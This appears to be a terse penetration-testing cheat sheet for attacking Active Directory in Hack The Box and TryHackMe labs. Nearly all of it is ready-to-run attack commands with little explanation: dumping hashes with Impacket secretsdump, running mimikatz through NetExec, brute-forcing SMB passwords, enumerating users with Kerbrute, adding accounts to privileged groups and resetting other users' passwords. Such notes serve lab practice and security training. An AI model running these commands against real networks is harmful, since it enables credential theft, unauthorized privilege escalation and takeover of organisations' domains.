Impacket
To get TGT (Ticket Granting Ticket with impacket):
getTGT.py domain.htb/user
To dump hashes:
secretsdump.py htb.local/aditya:aditya@<ip>
Bloodhound
To use TGT with bloodhound
KRB5CCNAME=user.ccache ./bloodhound.py -k -dc dc.domain.htb -ns <ip> -c All -d domain.htb -u user@domain.htb
NetExec
mimikatz module:
nxc smb <ip> -u 'Administrator' -p 'PASS' --local-auth -M mimikatz
nxc smb <ip> -u 'Administrator' -p 'PASS' -M mimikatz
nxc smb <ip> -u Administrator -p 'PASS' -M mimikatz -o COMMAND='privilege::debug'
Password Bruteforce:
nsc smb <ip> -u userlist.out -p passlist.txt
Kerbrute
To check if users exist and then get their hashes:
kerbrute userenum --dc dc.domain.htb -d domain.htb username.txt
If hashcat can't crack use --downgrade flag
Enumeration
To check domain details
can also enumerate individual accounts
net user /domain
To check group details
To add new user to domain:
net user aditya aditya123@ /add /domain
To add user to a group:
net group "Exchange Windows Permissions" /add aditya
To check users in the group:
net group "Tier 1 Admins" /domain
To check password policy, lockout policy, etc:
To reset other user's password if permission present use:
Set-ADAccountPassword name -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
New Password: *********
If username already present in format of : then:
runas.exe /netonly /user:<domain>\<username> cmd.exe
Powershell:
Get-ADUser -Identity mr.robot -Server evilcorp.com -Properties *
Get-ADUser -Filter 'Name -like "*stevens"' -Server za.tryhackme.com | Format-Table Name,SamAccountName -A
For groups:
Get-ADGroup -Identity Administrators -Server za.tryhackme.com
Get-ADGroupMember -Identity Administrators -Server za.tryhackme.com
For domains:
Get-ADDomain -Server za.tryhackme.com
Change Password:
Set-ADAccountPassword -Identity gordon.stevens -Server za.tryhackme.com -OldPassword (ConvertTo-SecureString -AsPlaintext "old" -force) -NewPassword (ConvertTo-SecureString -AsPlainText "new" -Force)
